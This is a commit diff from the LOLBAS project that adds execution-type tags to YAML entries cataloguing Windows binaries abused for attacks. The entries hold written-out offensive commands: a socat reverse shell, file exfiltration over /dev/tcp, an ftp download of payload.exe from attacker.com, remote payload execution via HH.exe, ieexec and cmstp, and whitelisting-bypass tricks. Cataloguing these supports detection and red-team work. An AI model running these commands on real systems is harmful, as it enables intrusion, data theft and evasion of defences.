Adding Execute tags to most LOLBas (#405)

LOLBAS-Project · Dec 29, 2024 · b9a6cd6 · b9a6cd6
1 parent baaa5bb
commit b9a6cd6
Show file tree

Hide file tree

Showing 129 changed files with 520 additions and 59 deletions.
diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: .NetObjects
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: Local Admin
     MitreID: T1053.002
     OperatingSystem: Windows 7 or older
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\WINDOWS\System32\At.exe
   - Path: C:\WINDOWS\SysWOW64\At.exe

diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\System32\Atbroker.exe
   - Path: C:\Windows\SysWOW64\Atbroker.exe

diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml
@@ -11,27 +11,35 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
     Description: Executes a reverseshell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\Windows\System32\bash.exe
   - Path: C:\Windows\SysWOW64\bash.exe

diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Input: INF
+      - Execute: INF
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -21,7 +21,8 @@ Commands:
     MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
     Tags:
-      - Input: INF
+      - Execute: INF
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\System32\cmstp.exe
   - Path: C:\Windows\SysWOW64\cmstp.exe

diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml
@@ -11,13 +11,17 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
   - Command: "conhost.exe --headless calc.exe"
     Description: Execute calc.exe with conhost.exe as parent process
     Usecase: Specify --headless parameter to hide child process window (if applicable)
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: c:\windows\system32\conhost.exe
 Detection:

diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml
@@ -13,6 +13,15 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Execute: DLL
+  - Command: control.exe c:\windows\tasks\evil.cpl
+    Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
+    Usecase: Use to execute code and bypass application whitelisting
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.002
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: DLL
 Full_Path:
   - Path: C:\Windows\System32\control.exe
   - Path: C:\Windows\SysWOW64\control.exe

diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\System32\CustomShellHost.exe
 Detection:

diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml
@@ -11,6 +11,9 @@ Commands:
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: ClickOnce
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml
@@ -11,13 +11,17 @@ Commands:
     Privileges: User
     MitreID: T1003.003
     OperatingSystem: Windows server
+    Tags:
+      - Execute: CMD
   - Command: diskshadow> exec calc.exe
     Description: Execute commands using diskshadow.exe to spawn child process
     Usecase: Use diskshadow to bypass defensive counter measures
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows server
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\Windows\System32\diskshadow.exe
   - Path: C:\Windows\SysWOW64\diskshadow.exe

diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml
@@ -13,6 +13,7 @@ Commands:
     OperatingSystem: Windows server
     Tags:
       - Execute: DLL
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\System32\Dnscmd.exe
   - Path: C:\Windows\SysWOW64\Dnscmd.exe

diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml
@@ -46,7 +46,6 @@ Commands:
     Privileges: Admin
     MitreID: T1003.003
     OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
-
 Full_Path:
   - Path: C:\Windows\System32\esentutl.exe
   - Path: C:\Windows\SysWOW64\esentutl.exe

diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml
@@ -13,6 +13,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
     Tags:
       - Application: GUI
+      - Execute: EXE
   - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
     Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
     Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@@ -22,6 +23,7 @@ Commands:
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
     Tags:
       - Application: GUI
+      - Execute: .NetObjects
 Full_Path:
   - Path: C:\Windows\System32\eventvwr.exe
   - Path: C:\Windows\SysWOW64\eventvwr.exe

diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml
@@ -11,13 +11,17 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
   - Command: explorer.exe C:\Windows\System32\notepad.exe
     Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
     Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\explorer.exe
   - Path: C:\Windows\SysWOW64\explorer.exe

diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml
@@ -11,13 +11,17 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
     Category: ADS
     Privileges: User
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\System32\forfiles.exe
   - Path: C:\Windows\SysWOW64\forfiles.exe

diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml
@@ -25,6 +25,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\System32\fsutil.exe
   - Path: C:\Windows\SysWOW64\fsutil.exe

diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
     Description: Download
     Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.

diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml
@@ -11,13 +11,17 @@ Commands:
     Privileges: Administrator
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
   - Command: Gpscript /startup
     Description: Executes startup scripts configured in Group Policy
     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\Windows\System32\gpscript.exe
   - Path: C:\Windows\SysWOW64\gpscript.exe

diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml
@@ -11,13 +11,30 @@ Commands:
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
+      - Application: GUI
   - Command: HH.exe c:\windows\system32\calc.exe
     Description: Executes calc.exe with HTML Help.
     Usecase: Execute process with HH.exe
     Category: Execute
     Privileges: User
     MitreID: T1218.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
+      - Application: GUI
+  - Command: HH.exe http://some.url/payload.chm
+    Description: Executes a remote payload.chm file which can contain commands.
+    Usecase: Execute commands with HH.exe
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.001
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
+      - Execute: CHM
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\hh.exe
   - Path: C:\Windows\SysWOW64\hh.exe

diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: INF
 Full_Path:
   - Path: c:\windows\system32\ie4uinit.exe
   - Path: c:\windows\sysWOW64\ie4uinit.exe

diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Program Files\Internet Explorer\iediagcmd.exe
 Detection:

diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml
@@ -11,13 +11,19 @@ Commands:
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    Tags:
+      - Execute: Remote
+      - Execute: EXE (.NET)
   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
     Description: Downloads and executes bypass.exe from the remote server.
     Usecase: Download and run attacker code from remote location
     Category: Execute
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    Tags:
+      - Execute: Remote
+      - Execute: EXE (.NET)
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: Admin
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: INF
 Full_Path:
   - Path: C:\Windows\System32\Infdefaultinstall.exe
   - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe

diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml
@@ -12,8 +12,8 @@ Commands:
     MitreID: T1218.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Execute: DLL
-      - Input: Custom Format
+      - Execute: DLL (.NET)
+      - Execute: EXE (.NET)
   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
     Description: Execute the target .NET DLL or EXE.
     Usecase: Use to execute code and bypass application whitelisting
@@ -22,8 +22,8 @@ Commands:
     MitreID: T1218.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Execute: DLL
-      - Input: Custom Format
+      - Execute: DLL (.NET)
+      - Execute: EXE (.NET)
   - Command: InstallUtil.exe https://example.com/payload
     Description: It will download a remote payload and place it in INetCache.
     Usecase: Downloads payload from remote server

diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Execute: WSH
+      - Execute: JScript
   - Command: jsc.exe /t:library Library.js
     Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
     Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -21,7 +21,7 @@ Commands:
     MitreID: T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Execute: WSH
+      - Execute: JScript
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe